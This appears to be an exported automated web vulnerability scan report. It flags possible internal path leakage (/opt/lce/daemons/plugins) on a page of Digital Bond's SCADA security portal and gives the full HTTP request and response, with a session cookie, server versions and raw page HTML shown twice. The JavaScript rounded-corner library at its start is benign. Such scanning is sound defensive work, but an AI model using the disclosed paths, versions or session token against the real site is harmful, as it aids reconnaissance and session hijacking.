el.vml[v].coordsize = (el.dim.Width*mult) + ', ' + (el.dim.Height*mult);
assign(el.vml[v], true);
}
assign(el.vmlBox, false);
if (DD_roundies.IE8) {
el.vml.stroke.style.margin = '-1px';
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
el.vml.color.style.margin = (el.bW.Top-1) + 'px ' + (el.bW.Left-1) + 'px';
}
},
vmlPath: function(el) {
var coords = function(direction, w, h, r, aL, aT, mult) {
var cmd = direction ? ['m', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'qx', 'l'] : ['qx', 'l', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'm']; /* whoa */
aL *= mult;
aT *= mult;
w *= mult;
h *= mult;
var R = r.slice(); /* do not affect original array */
for (var i=0; i<4; i++) {
R[i] *= mult;
R[i] = Math.min(w/2, h/2, R[i]); /* make sure you do not get funky shapes - pick the smallest: half of the width, half of the height, or current value */
}
var coords = [
cmd[0] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT),
cmd[1] + Math.floor(R[0]+aL) +','+ Math.floor(0+aT),
cmd[2] + Math.ceil(w-R[1]+aL) +','+ Math.floor(0+aT),
cmd[3] + Math.ceil(w+aL) +','+ Math.floor(R[1]+aT),
cmd[4] + Math.ceil(w+aL) +','+ Math.ceil(h-R[2]+aT),
cmd[5] + Math.ceil(w-R[2]+aL) +','+ Math.ceil(h+aT),
cmd[6] + Math.floor(R[3]+aL) +','+ Math.ceil(h+aT),
cmd[7] + Math.floor(0+aL) +','+ Math.ceil(h-R[3]+aT),
cmd[8] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT)
];
if (!direction) {
coords.reverse();
}
var path = coords.join('');
return path;
};
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
var bW = el.bW;
var rad = el.DD_radii.slice();
/* determine outer curves */
var outer = coords(true, el.dim.Width, el.dim.Height, rad, 0, 0, 2);
/* determine inner curves */
rad[0] -= Math.max(bW.Left, bW.Top);
rad[1] -= Math.max(bW.Top, bW.Right);
rad[2] -= Math.max(bW.Right, bW.Bottom);
rad[3] -= Math.max(bW.Bottom, bW.Left);
for (var i=0; i<4; i++) {
rad[i] = Math.max(rad[i], 0);
}
var inner = coords(false, el.dim.Width-bW.Left-bW.Right, el.dim.Height-bW.Top-bW.Bottom, rad, bW.Left, bW.Top, 2);
var image = coords(true, el.dim.Width-bW.Left-bW.Right+1, el.dim.Height-bW.Top-bW.Bottom+1, rad, bW.Left, bW.Top, 1);
/* apply huge path string */
el.vml.color.path = inner;
el.vml.image.path = image;
el.vml.stroke.path = outer + inner;
this.clipImage(el);
},
nixBorder: function(el) {
var s = el.currentStyle;
var sides = ['Top', 'Left', 'Right', 'Bottom'];
for (var i=0; i<4; i++) {
el.runtimeStyle['padding' + sides[i]] = (parseInt(s['padding' + sides[i]], 10) || 0) + (parseInt(s['border' + sides[i] + 'Width'], 10) || 0) + 'px';
}
el.runtimeStyle.border = 'none';
},
clipImage: function(el) {
var lib = DD_roundies;
if (!el.vmlBg || !lib.imgSize[el.vmlBg]) {
return;
}
var thisStyle = el.currentStyle;
var bg = {'X':0, 'Y':0};
var figurePercentage = function(axis, position) {
var fraction = true;
switch(position) {
case 'left':
case 'top':
bg[axis] = 0;
break;
case 'center':
bg[axis] = 0.5;
break;
case 'right':
case 'bottom':
bg[axis] = 1;
break;
default:
if (position.search('%') != -1) {
bg[axis] = parseInt(position, 10) * 0.01;
}
else {
fraction = false;
}
}
var horz = (axis == 'X');
bg[axis] = Math.ceil(fraction ? (( el.dim[horz ? 'Width' : 'Height'] - (el.bW[horz ? 'Left' : 'Top'] + el.bW[horz ? 'Right' : 'Bottom']) ) * bg[axis]) - (lib.imgSize[el.vmlBg][horz ? 'width' : 'height'] * bg[axis]) : parseInt(position, 10));
bg[axis] += 1;
};
for (var b in bg) {
figurePercentage(b, thisStyle['backgroundPosition'+b]);
}
el.vml.image.filler.position = (bg.X/(el.dim.Width-el.bW.Left-el.bW.Right+1)) + ',' + (bg.Y/(el.dim.Height-el.bW.Top-el.bW.Bottom+1));
var bgR = thisStyle.backgroundRepeat;
var c = {'T':1, 'R':el.dim.Width+1, 'B':el.dim.Height+1, 'L':1}; /* these are defaults for repeat of any kind */
var altC = { 'X': {'b1': 'L', 'b2': 'R', 'd': 'Width'}, 'Y': {'b1': 'T', 'b2': 'B', 'd': 'Height'} };
if (bgR != 'repeat') {
c = {'T':(bg.Y), 'R':(bg.X+lib.imgSize[el.vmlBg].width), 'B':(bg.Y+lib.imgSize[el.vmlBg].height), 'L':(bg.X)}; /* these are defaults for no-repeat - clips down to the image location */
if (bgR.search('repeat-') != -1) { /* now let's revert to dC for repeat-x or repeat-y */
var v = bgR.split('repeat-')[1].toUpperCase();
c[altC[v].b1] = 1;
c[altC[v].b2] = el.dim[altC[v].d]+1;
}
if (c.B > el.dim.Height) {
c.B = el.dim.Height+1;
}
}
el.vml.image.style.clip = 'rect('+c.T+'px '+c.R+'px '+c.B+'px '+c.L+'px)';
},
pseudoClass: function(el) {
var self = this;
setTimeout(function() { /* would not work as intended without setTimeout */
self.applyVML(el);
}, 1);
},
reposition: function(el) {
this.vmlOffsets(el);
this.vmlPath(el);
},
roundify: function(rad) {
this.style.behavior = 'none';
if (!this.currentStyle) {
return;
}
else {
var thisStyle = this.currentStyle;
}
var allowed = {BODY: false, TABLE: false, TR: false, TD: false, SELECT: false, OPTION: false, TEXTAREA: false};
if (allowed[this.nodeName] === false) { /* elements not supported yet */
return;
}
var self = this; /* who knows when you might need a setTimeout */
var lib = DD_roundies;
this.DD_radii = rad;
this.dim = {};
/* attach handlers */
var handlers = {resize: 'reposition', move: 'reposition'};
if (this.nodeName == 'A') {
var moreForAs = {mouseleave: 'pseudoClass', mouseenter: 'pseudoClass', focus: 'pseudoClass', blur: 'pseudoClass'};
for (var a in moreForAs) {
handlers[a] = moreForAs[a];
}
}
for (var h in handlers) {
this.attachEvent('on' + h, function() {
lib[handlers[h]](self);
});
}
this.attachEvent('onpropertychange', function() {
lib.readPropertyChanges(self);
});
/* ensure that this elent and its parent is given hasLayout (needed for accurate positioning) */
var giveLayout = function(el) {
el.style.zoom = 1;
if (el.currentStyle.position == 'static') {
el.style.position = 'relative';
}
};
giveLayout(this.offsetParent);
giveLayout(this);
/* create vml elements */
this.vmlBox = document.createElement('ignore'); /* IE8 really wants to be encased in a wrapper element for the VML to work, and I don't want to disturb getElementsByTagName('div') - open to suggestion on how to do this differently */
this.vmlBox.runtimeStyle.cssText = 'behavior:none; position:absolute; margin:0; padding:0; border:0; background:none;'; /* super important - if something accidentally matches this (you yourseld did this once, Drew), you'll get infinitely-created elements and a frozen browser! */
this.vmlBox.style.zIndex = thisStyle.zIndex;
this.vml = {'color':true, 'image':true, 'stroke':true};
for (var v in this.vml) {
this.vml[v] = document.createElement(lib.ns + ':shape');
this.vml[v].filler = document.createElement(lib.ns + ':fill');
this.vml[v].appendChild(this.vml[v].filler);
this.vml[v].stroked = false;
this.vml[v].style.position = 'absolute';
this.vml[v].style.zIndex = thisStyle.zIndex;
this.vml[v].coordorigin = '1,1';
this.vmlBox.appendChild(this.vml[v]);
}
this.vml.image.fillcolor = 'none';
this.vml.image.filler.type = 'tile';
this.parentNode.insertBefore(this.vmlBox, this);
this.isImg = false;
if (this.nodeName == 'IMG') {
this.isImg = true;
this.style.visibility = 'hidden';
}
setTimeout(function() {
lib.applyVML(self);
}, 1);
}
};
try {
document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
DD_roundies.IEversion();
DD_roundies.createVmlNameSpace();
DD_roundies.createVmlStyleSheet();
if (DD_roundies.IE8 && document.attachEvent && DD_roundies.querySelector) {
document.attachEvent('onreadystatechange', function() {
if (document.readyState == 'complete') {
var selectors = DD_roundies.selectorsToProcess;
var length = selectors.length;
var delayedCall = function(node, radii, index) {
setTimeout(function() {
DD_roundies.roundify.call(node, radii);
}, index*100);
};
for (var i=0; i<length; i++) {
var results = document.querySelectorAll(selectors[i].selector);
var rLength = results.length;
for (var r=0; r<rLength; r++) {
if (results[r].nodeName != 'INPUT') { /* IE8 doesn't like to do this to inputs yet */
delayedCall(results[r], selectors[i].radii, r);
}
}
}
}
});
}
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
1
TOTAL
INFORMATION
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Remediation
- Error messages should be disabled.
- Remove this kind of private data from the output.
External References
|
- /tools/portaledge/portaledge-sem-integration/
/tools/portaledge/portaledge-sem-integration/ |
Identified Internal Path(s)
/opt/lce/daemons/plugins
Request
GET /tools/portaledge/portaledge-sem-integration/ HTTP/1.1
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:18 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2je>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:18 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: ceea6649f19b00fbe522eeac028b1b77
Content-Encoding:
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Portaledge SEM Integration | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/comment-reply.js?ver=20090102'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='up' title='Portaledge' href='http://www.digitalbond.com/tools/portaledge/' /><link rel='prev' title='Network Device Performance Degradation Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/network-device-performance-degradation-event/' /><link rel='next' title='Simple Network Availability Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/simple-network-availability-event/' /><link rel='shortlink' href='http://wp.me/P1lryr-2je' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,417] --><link rel="canonical" href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="page page-id-8880 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Left Sidebar -->
<td id="left">
<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul></div>
</td>
<!-- / Left Sidebar -->
<!-- Main Column -->
<td id="middle">
<div class="post-8880 page type-page status-publish hen..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:18 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2je>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:18 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: ceea6649f19b00fbe522eeac028b1b77
Content-Encoding:
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Portaledge SEM Integration | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/comment-reply.js?ver=20090102'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='up' title='Portaledge' href='http://www.digitalbond.com/tools/portaledge/' /><link rel='prev' title='Network Device Performance Degradation Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/network-device-performance-degradation-event/' /><link rel='next' title='Simple Network Availability Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/simple-network-availability-event/' /><link rel='shortlink' href='http://wp.me/P1lryr-2je' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,417] --><link rel="canonical" href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="page page-id-8880 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a 